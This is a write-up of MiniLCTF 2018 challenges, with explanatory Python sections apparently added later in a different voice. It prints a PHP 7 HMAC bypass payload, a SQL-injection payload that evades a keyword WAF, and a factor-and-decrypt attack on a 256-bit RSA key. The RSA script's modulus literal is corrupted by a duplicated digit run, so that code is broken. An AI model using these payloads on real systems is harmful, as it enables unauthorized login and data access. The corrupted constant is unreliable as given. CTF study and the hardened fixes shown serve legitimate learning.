MiniLCTF 2018 WriteUp

Web

Web easy bypass

```php
<?php
highlight_file(__FILE__);
if(empty($_POST['hmac']) || empty($_POST['host'])){
    header('HTTP/1.0 400 Bad Request');
    exit;
}
$secret = getenv("SECRET");
// If a nonce is supplied, the key is derived from it. When nonce is an
// array (nonce[]=), PHP 7's hash_hmac() emits a warning and returns NULL.
if(isset($_POST['nonce']))
    $secret = hash_hmac('sha256',$_POST['nonce'],$secret);
// With $secret === NULL the key is coerced to "", so the expected hmac no
// longer depends on SECRET and can be computed by anyone.
$hmac = hash_hmac('sha256',$_POST['host'],$secret);
if($hmac !== $_POST['hmac']){
    header('HTTP/1.0 403 Forbidden');
    exit;
}
echo exec('cat ../flag.txt');
?>
```

I had no idea how to do this, so I googled and found this, heh heh:

https://www.securify.nl/blog/SFY20180101/spot-the-bug-challenge-2018-warm-up.html

Chinese translation: https://cyto.top/2018/05/19/translate-spot-the-bug-challenge2018-warm-up-wp/

payload:

```
hmac=6d37c0c2dd3737654ac70c307c036d9308f2d7284bee4393b2c36746b8909a18&host=cyto&nonce[]=
```

getflag: MiniLCTF{3asy_hm4c_Byp4ss_for_U}
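The bypass behind the payload above, as an added Python model that is not code from the original post, from the challenge, or from the securify write-up. `php_hash_hmac` emulates the two PHP 7 behaviours the trick relies on (a non-string data argument such as `nonce[]=` makes `hash_hmac()` return NULL, and a NULL key is coerced to the empty string), `vulnerable_check` mirrors the challenge's control flow, `forge` is what the attacker computes, and `hardened_check` is a fixed version. `SERVER_SECRET` is a constructed placeholder, which is the point: the forged value never depends on it. If this analysis is right, `forge("cyto")` reproduces the hex in the payload above.

```python
import hashlib
import hmac

# Placeholder for the server's SECRET environment variable (constructed;
# the real value is unknown and, as the bypass shows, never used).
SERVER_SECRET = b"unknown-server-secret"


def php_hash_hmac(data, key):
    """Emulate PHP 7's hash_hmac('sha256', $data, $key).

    PHP 7 emits a warning and returns NULL when $data is not a string
    (nonce[]= makes $_POST['nonce'] an array); a NULL $key is coerced to "".
    PHP 8 throws a TypeError here instead, so the trick is PHP 7 specific.
    Returns the lowercase hex digest, like PHP's default raw_output=false.
    """
    if not isinstance(data, (str, bytes)):
        return None
    if key is None:
        key = ""
    data = data.encode() if isinstance(data, str) else data
    key = key.encode() if isinstance(key, str) else key
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def vulnerable_check(post, secret=SERVER_SECRET):
    """The challenge's control flow; True means 'cat ../flag.txt' runs."""
    key = secret
    if "nonce" in post:
        key = php_hash_hmac(post["nonce"], key)   # None for nonce[]=
    expected = php_hash_hmac(post["host"], key)   # None key -> empty key
    return expected == post["hmac"]


def forge(host):
    """Attacker side: HMAC-SHA256 under the empty key the server ends up using."""
    return hmac.new(b"", host.encode(), hashlib.sha256).hexdigest()


def client_hmac(host, nonce, secret):
    """What a legitimate client with the real secret sends (same hex-key chaining)."""
    key = hmac.new(secret, nonce.encode(), hashlib.sha256).hexdigest().encode()
    return hmac.new(key, host.encode(), hashlib.sha256).hexdigest()


def hardened_check(post, secret=SERVER_SECRET):
    """Fixed version: reject non-string fields so the key can never collapse
    to "", keep the original key derivation, compare in constant time."""
    if not (isinstance(post.get("host"), str) and isinstance(post.get("hmac"), str)):
        return False
    if "nonce" in post and not isinstance(post["nonce"], str):
        return False
    key = secret
    if "nonce" in post:
        key = hmac.new(key, post["nonce"].encode(), hashlib.sha256).hexdigest().encode()
    expected = hmac.new(key, post["host"].encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, post["hmac"])


if __name__ == "__main__":
    forged = {"host": "cyto", "hmac": forge("cyto"), "nonce": []}
    print("forged hmac       :", forged["hmac"])
    print("vulnerable accepts:", vulnerable_check(forged))
    print("hardened accepts  :", hardened_check(forged))
```

The real fix is the type check, not the constant-time compare: `!==` on two strings is not the problem here, the problem is that a warning-and-NULL path silently turns a keyed MAC into an unkeyed hash.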

Web baby sqli (solved after the event)

Challenge:

Xiao Ming's blog kept getting hacked, so in a fit of anger he wrote a super-powerful WAF. Can you big-shot hackers still bypass it?
hint: the username is admin
hint1:
WAF code

```php
if(preg_match("/|#|;|,|is|file|drop|union|select|ascii|mid|from|(|)|or|\^|=|<|>|like|regexp|for|and|limit|file|--|||&|".urldecode('%09')."|".urldecode("%0b")."|".urldecode('%0c')."|".urldecode('%0d')."|".urldecode('%a0')."/i",$username)){
die('wafed by pupiles');
}
```

$password is filtered the same way as $username
Database query code

```php
mysql_query("SELECT * FROM pupiles_admin where username = '".$username."' and passwd = '".md5($passwd)."'");
```

hint2:
First think about how to bypass the comment characters

From a senior player's writeup:

Use the backtick ` as the comment: MySQL treats whatever follows the backtick as an alias, orz.

So the payload:

```
username=admin' group by @`
```

getflag: minil{Please_have_Fun!}
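The blacklist and the bypass, as an added Python example that is not code from the challenge or from either writeup. `BLACKLIST` reconstructs the hint's PCRE (the copy in the hint appears to have lost its backslashes in extraction, so the escaping of `(`, `)`, `--` and `||` below is an assumption), `wafed` is the challenge's check, `vulnerable_query` is the string the challenge concatenates, and `safe_lookup` is the parameterised alternative run against a constructed in-memory sqlite table standing in for `pupiles_admin`. MD5 for the password column is the challenge's scheme, kept only so the queries match the hint.

```python
import hashlib
import re
import sqlite3

# Reconstruction of the challenge's blacklist (escaping assumed, see lead-in).
BLACKLIST = re.compile(
    r"/|#|;|,|is|file|drop|union|select|ascii|mid|from|\(|\)|or|\^|=|<|>"
    r"|like|regexp|for|and|limit|--|\|\||&|\t|\x0b|\x0c|\r|\xa0",
    re.IGNORECASE,
)

# The payload from the writeup: no '#', '--' or '/*', no 'or'/'and', no '='.
PAYLOAD = "admin' group by @`"


def wafed(value):
    """True if the challenge WAF would reject this value ('wafed by pupiles')."""
    return BLACKLIST.search(value) is not None


def vulnerable_query(username, passwd):
    """The SQL string the challenge builds by concatenation. In MySQL the
    unterminated backtick swallows the rest of the line, password clause
    included (this file only prints it; sqlite does not parse it that way)."""
    digest = hashlib.md5(passwd.encode()).hexdigest()
    return ("SELECT * FROM pupiles_admin where username = '" + username
            + "' and passwd = '" + digest + "'")


def demo_db():
    """In-memory stand-in for pupiles_admin with one constructed row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pupiles_admin (username TEXT, passwd TEXT)")
    conn.execute("INSERT INTO pupiles_admin VALUES ('admin', ?)",
                 (hashlib.md5(b"hunter2").hexdigest(),))
    return conn


def safe_lookup(conn, username, passwd):
    """Parameterised version: the input is data, never SQL syntax, so a
    blacklist is unnecessary and the backtick trick has nothing to comment out."""
    row = conn.execute(
        "SELECT username FROM pupiles_admin WHERE username = ? AND passwd = ?",
        (username, hashlib.md5(passwd.encode()).hexdigest()),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    for probe in ("admin'#", "admin'-- ", "admin'/*", "admin' or 1=1", PAYLOAD):
        print(repr(probe).ljust(20), "wafed" if wafed(probe) else "passes the WAF")
    print(vulnerable_query(PAYLOAD, "x"))
    conn = demo_db()
    print(safe_lookup(conn, PAYLOAD, "x"))        # None: no injection
    print(safe_lookup(conn, "admin", "hunter2"))  # admin: real credentials
```

The list shows the usual pattern: every classic comment and boolean token is blocked, yet the grammar still has an unlisted way to truncate the statement. Blocking characters is a race the filter loses; parameterisation removes the category.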

Crypto

Crypto Easy RSA

```
$ openssl rsa -in c1-public.pem -pubin -noout -text -modulus
Public-Key: (256 bit)
Modulus:
    00:bf:e9:96:75:20:88:88:5f:2e:a2:35:2f:df:3e:
    95:15:f6:62:fc:4d:34:75:dd:a6:f8:a1:60:8e:54:
    b4:16:b7
Exponent: 65537 (0x10001)
Modulus=BFE996752088885F2EA2352FDF3E9515F662FC4D3475DDA6F8A1608E54B416B7
```
```
e 65537
n BFE996752088885F2EA2352FDF3E9515F662FC4D3475DDA6F8A1608E54B416B7
```
```python
>>> print int('BFE996752088885F2EA2352FDF3E9515F662FC4D3475DDA6F8A1608E54B416B7',16)
86804467865189181998675682302645596768517985924006311724377177674474176386743
```

http://factordb.com/index.php?query=86804467865189181998675682302645596768517985924006311724377177674474176386743

```
p 293086410338424676391341741631987307899
q 296173636181072725338746212384476813557
```
```python
#!/usr/bin/env python2
# -*- coding:utf8 -*-
import gmpy
import rsa


def foo():
    # p and q from factordb, n and e from the public key above
    p = 293086410338424676391341741631987307899
    q = 296173636181072725338746212384476813557
    n = 86804467865189181998675682302645682302645596768517985924006311724377177674474176386743
    e = 65537
    # private exponent: d = e^-1 mod (p-1)(q-1)
    d = int(gmpy.invert(e, (p - 1) * (q - 1)))
    private_key = rsa.PrivateKey(n, e, d, p, q)
    # c1.txt holds the raw ciphertext; rsa.decrypt strips the PKCS#1 v1.5 padding
    with open('c1.txt', 'rb') as f:
        print rsa.decrypt(f.read(), private_key).decode()


if __name__ == '__main__':
    foo()
    print 'ok'
```

getflag:

minil{rsa_1s_c00l}
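What the `rsa` package does for the script above, written out as an added Python 3 example (not code from the original post or from the `rsa` library): rebuild the private key from the challenge's p, q and e, decrypt with the CRT recombination real implementations use, and strip PKCS#1 v1.5 type-2 padding. There is no c1.txt here, so a ciphertext is constructed inline by padding and encrypting the flag under the challenge's public key; the pad/unpad helpers are written here for illustration and are not a library API.

```python
import os

# Challenge values: n and e from c1-public.pem, p and q from factordb.
N = 86804467865189181998675682302645596768517985924006311724377177674474176386743
E = 65537
P = 293086410338424676391341741631987307899
Q = 296173636181072725338746212384476813557


def private_key_from_factors(p, q, e):
    """Rebuild the private key once n is factored: d = e^-1 mod phi(n),
    plus the CRT values (dp, dq, qinv) that real key files carry."""
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)                      # modular inverse, Python 3.8+
    return {"n": p * q, "e": e, "d": d, "p": p, "q": q,
            "dp": d % (p - 1), "dq": d % (q - 1), "qinv": pow(q, -1, p)}


def rsa_decrypt_crt(c, key):
    """c^d mod n via Garner's CRT recombination (two half-size exponentiations)."""
    m1 = pow(c, key["dp"], key["p"])
    m2 = pow(c, key["dq"], key["q"])
    h = (key["qinv"] * (m1 - m2)) % key["p"]
    return m2 + h * key["q"]


def pkcs1_v15_pad(msg, k):
    """EME-PKCS1-v1_5 type 2 block: 00 02 <random non-zero PS, >= 8 bytes> 00 <msg>."""
    if len(msg) > k - 11:
        raise ValueError("message too long for modulus")
    ps = b""
    while len(ps) < k - 3 - len(msg):
        byte = os.urandom(1)
        if byte != b"\x00":
            ps += byte
    return b"\x00\x02" + ps + b"\x00" + msg


def pkcs1_v15_unpad(block):
    """Strip the type 2 block. This branches on the padding, i.e. it is not
    constant-time; exposing its success/failure to a network peer is the
    Bleichenbacher padding-oracle setting."""
    if len(block) < 11 or block[:2] != b"\x00\x02":
        raise ValueError("bad padding")
    sep = block.find(b"\x00", 2)
    if sep < 10:
        raise ValueError("bad padding")
    return block[sep + 1:]


def encrypt(msg, n, e):
    k = (n.bit_length() + 7) // 8            # 32 bytes for this 256-bit n
    return pow(int.from_bytes(pkcs1_v15_pad(msg, k), "big"), e, n)


def decrypt(c, key):
    k = (key["n"].bit_length() + 7) // 8
    return pkcs1_v15_unpad(rsa_decrypt_crt(c, key).to_bytes(k, "big"))


if __name__ == "__main__":
    key = private_key_from_factors(P, Q, E)
    c = encrypt(b"minil{rsa_1s_c00l}", N, E)  # constructed sample ciphertext
    print(decrypt(c, key))
```

A 256-bit modulus leaves 21 bytes of payload after the 11 bytes of padding overhead, which is why the flag fits in a single block; it is also why factordb answers instantly, since 128-bit primes are far below what ECM or NFS need to work hard for.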

Misc

Misc1 Welcome

MiniLCTF{Welcome_to_MakerCTF233}

Misc2 Nazo

1

2

3

4

5

Morse code

key: sos

6

base64

key: 1029174037

7

macintosh

8

saionjisekai

9

Stretch the image, then rotate it

pineapple

10

Google reverse image search

mouse

11

neweroslesstofu

12

One person sets a number, the other guesses. The setter first thinks of a 4-digit number with no repeated digits, e.g. 8123, without letting the guesser know. The guesser then starts guessing. For each guess the setter answers with "xAyB"; e.g. for the guess 1562 the answer is 0A2B, where the number before A is the count of digits that are correct and in the right position, and the number before B is the count of digits that are correct but in the wrong position.

9506

13

Open in a new tab: thealpha

14

Download the image, binwalk extracts a torrent from it, download that

greendam

15

koenokiseki

16

Save it and open it in Sublime

Remove these rect elements

secretvg

17

Select all, and you find:

Inspect element

18

key: th4nky0u

Misc Questionnaire

Fill in the questionnaire, get the flag.

I'm very cute, please give me money.